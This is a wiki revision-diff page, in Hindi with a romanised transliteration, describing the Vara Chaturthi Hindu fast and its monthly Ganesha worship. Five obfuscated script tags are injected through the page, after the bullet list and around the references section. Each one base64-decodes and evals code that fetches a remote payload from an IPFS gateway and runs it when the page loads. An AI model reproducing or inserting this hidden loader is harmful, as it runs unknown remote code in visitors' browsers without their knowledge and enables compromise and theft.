Difference between revisions of "वर चतुर्थी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[चतुर्थी]] से आरम्भ करना चाहिए।  
 
*यह व्रत [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[चतुर्थी]] से आरम्भ करना चाहिए।  
*इसमें प्रतिमास [[गणेश]] पूजन करना चाहिए। तथा उस दिन एकभक्त रहना चाहिए किन्तु क्षार एवं लवण का प्रयोग नहीं करना चाहिए।  
+
*इसमें प्रतिमास [[गणेश]] पूजन करना चाहिए। तथा उस दिन एकभक्त रहना चाहिए किन्तु [[क्षार]] एवं लवण का प्रयोग नहीं करना चाहिए।  
 
*यह चार वर्षों तक करना चाहिए, किन्तु दूसरे वर्ष में नक्त, तीसरे में अयाचित एवं चौथे में उपवास करना चाहिए।<ref>हेमाद्रि (व्रतखण्ड 1, 530-31), स्कन्दपुराण से उद्धरण; कृत्यरत्नाकर (504); कालविवेक (190); वर्षक्रियाकौमुदी (498)।</ref>
 
*यह चार वर्षों तक करना चाहिए, किन्तु दूसरे वर्ष में नक्त, तीसरे में अयाचित एवं चौथे में उपवास करना चाहिए।<ref>हेमाद्रि (व्रतखण्ड 1, 530-31), स्कन्दपुराण से उद्धरण; कृत्यरत्नाकर (504); कालविवेक (190); वर्षक्रियाकौमुदी (498)।</ref>
 
   
 
   
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:38, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat margashirsh shukl paksh ki chaturthi se arambh karana chahie.
  • isamean pratimas ganesh poojan karana chahie. tatha us din ekabhakt rahana chahie kintu kshar evan lavan ka prayog nahian karana chahie.
  • yah char varshoan tak karana chahie, kintu doosare varsh mean nakt, tisare mean ayachit evan chauthe mean upavas karana chahie.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 530-31), skandapuran se uddharan; krityaratnakar (504); kalavivek (190); varshakriyakaumudi (498).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>